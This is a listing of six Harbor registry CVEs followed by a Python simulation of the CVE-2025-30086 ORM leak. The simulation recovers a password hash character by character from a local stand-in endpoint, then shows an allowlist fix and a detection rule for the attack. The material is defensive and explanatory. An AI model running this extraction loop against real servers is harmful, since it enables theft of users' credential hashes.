Harbor
Recent CVEs (1-6 of 6)
| CVE | Vendor / Product | Sev | Risk | CVSS | EPSS | KEV | Published | Description |
|---|---|---|---|---|---|---|---|---|
| CVE-2025-30086 | Harbor | Med | 0.25 | 4.9 | 0.00 | — | Jul 25, 2025 | CNCF Harbor 2.13.x before 2.13.1 and 2.12.x before 2.12.4 allows information disclosure by administrators, who can exploit an ORM leak in the `/api/v2.0/users` endpoint to read users' password hash and salt values. The `q` URL parameter lets a caller filter users by any column, and the fuzzy filter `password=~` can be abused to leak a user's password hash one character at a time. An attacker with administrator access could use this to extract highly sensitive data stored in the Harbor database. All endpoints that accept the `q` URL parameter are affected by this ORM leak. |
| CVE-2025-32019 | Harbor | Med | 0.20 | 4.1 | 0.00 | — | Jul 23, 2025 | Harbor is an open source trusted cloud native registry project that stores, signs, and scans content. Versions 2.11.2 and below, as well as 2.12.0-rc1 and 2.13.0-rc1, contain a vulnerability where the markdown field on the info tab page can be used to inject XSS code. Fixed in versions 2.11.3 and 2.12.3. |
| CVE-2026-4404 | Harbor | — | 0.00 | — | 0.00 | — | Mar 23, 2026 | Use of hard-coded credentials in GoHarbor Harbor version 2.15.0 and below allows attackers to use the default password and gain access to the web UI. |
| CVE-2024-22278 | Harbor | — | 0.00 | — | 0.00 | — | Aug 2, 2024 | Incorrect user permission validation in Harbor <v2.9.5 and Harbor <v2.10.3 allows authenticated users to modify configurations. |
| CVE-2024-22261 | Harbor | — | 0.00 | — | 0.00 | — | Jun 10, 2024 | SQL injection in Harbor allows privileged users to leak task IDs. |
| CVE-2024-22244 | Harbor | — | 0.00 | — | 0.00 | — | Jun 10, 2024 | Open redirect in Harbor <=v2.8.4, <=v2.9.2, and <=v2.10.0 may redirect a user to a malicious site. |
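The ORM-leak primitive behind CVE-2025-30086, worked as an added example (this is not Harbor's code and does not talk to a real instance): a local stand-in for the users endpoint that filters on any column, the allowlist check that closes the hole, and the character-by-character recovery loop an administrator-level attacker would run against the vulnerable form. The `q=<column>=~<value>` fuzzy-match syntax, its case-insensitive substring semantics, the column names and the user rows are assumptions, not taken from the page. Because the filter is a substring match rather than a prefix match, the recovery uses a depth-first search with backtracking: a candidate that matches somewhere in the middle of the hash can dead-end, and only a candidate that reaches the full length is guaranteed to be the whole value.

```python
"""Added example, not Harbor's code: a local simulation of the ORM-leak
oracle in CVE-2025-30086 and of the allowlist check that removes it.

Assumptions (not from the page): Harbor's fuzzy filter syntax is
"q=<column>=~<value>" and behaves like SQL ILIKE '%value%'; the column
names and user rows below are constructed sample data.
"""
from typing import Callable, Dict, List, Optional, Tuple

# Constructed sample rows standing in for the Harbor user table.
USERS: List[Dict[str, str]] = [
    {"user_id": "1", "username": "admin",
     "password": "5f4dcc3b5aa765d61d8327deb882cf99", "salt": "9a1b2c3d"},
    {"user_id": "2", "username": "ci-bot",
     "password": "e99a18c428cb38d5f260853678922e03", "salt": "4e5f6a7b"},
]

# Assumed allowlist for the hardened endpoint: only non-secret columns.
ALLOWED_FILTER_COLUMNS = ("user_id", "username")

HEX_ALPHABET = "0123456789abcdef"


def parse_fuzzy_filter(q: str) -> Tuple[str, str]:
    """Split 'column=~value'; only the fuzzy operator is modelled here."""
    column, op, value = q.partition("=~")
    if op != "=~" or not column:
        raise ValueError(f"unsupported filter: {q!r}")
    return column, value


def list_users_vulnerable(q: str) -> List[str]:
    """Pre-fix behaviour: any column, secrets included, is filterable."""
    column, value = parse_fuzzy_filter(q)
    return [u["username"] for u in USERS
            if value.lower() in u.get(column, "").lower()]


def list_users_hardened(q: str) -> List[str]:
    """Post-fix behaviour: refuse filters on columns outside the allowlist."""
    column, value = parse_fuzzy_filter(q)
    if column not in ALLOWED_FILTER_COLUMNS:
        raise ValueError(f"filtering on column {column!r} is not permitted")
    return [u["username"] for u in USERS
            if value.lower() in u[column].lower()]


def filter_rejected(endpoint: Callable[[str], List[str]], q: str) -> bool:
    """True when the endpoint refuses the filter instead of answering it."""
    try:
        endpoint(q)
    except ValueError:
        return True
    return False


def leak_column(endpoint: Callable[[str], List[str]], username: str,
                column: str, length: int,
                alphabet: str = HEX_ALPHABET) -> Tuple[str, int]:
    """Recover a secret column value for `username` one character at a time.

    Each query asks whether `candidate` is a substring of the target's value
    (the user is in the result set iff it is).  The search grows the candidate
    depth-first; a candidate of the full length can only be the whole value,
    so the first full-length hit is the secret.  Returns (value, query_count).
    """
    queries = 0

    def present(candidate: str) -> bool:
        nonlocal queries
        queries += 1
        return username in endpoint(f"{column}=~{candidate}")

    def grow(prefix: str) -> Optional[str]:
        if len(prefix) == length:
            return prefix
        for ch in alphabet:
            if present(prefix + ch):          # substring exists somewhere
                found = grow(prefix + ch)     # try to extend it
                if found is not None:
                    return found
        return None                           # dead end: backtrack

    result = grow("")
    if result is None:
        raise RuntimeError("nothing recovered; check length/alphabet assumptions")
    return result, queries


if __name__ == "__main__":
    digest, n = leak_column(list_users_vulnerable, "admin", "password", 32)
    print(f"vulnerable endpoint leaked admin's hash in {n} queries: {digest}")
    print("hardened endpoint rejects password filter:",
          filter_rejected(list_users_hardened, "password=~5"))
```

The fix is the allowlist in `list_users_hardened`, not any change to the query loop: since the page notes that every `q`-capable endpoint shares the problem, the same column check belongs in the shared filter parser rather than in one handler. Note also that the leak needs no error messages or timing, only membership of the target in the result set, so generic response-size or status-code monitoring will not catch it; an alert on `q` filters naming `password` or `salt` would.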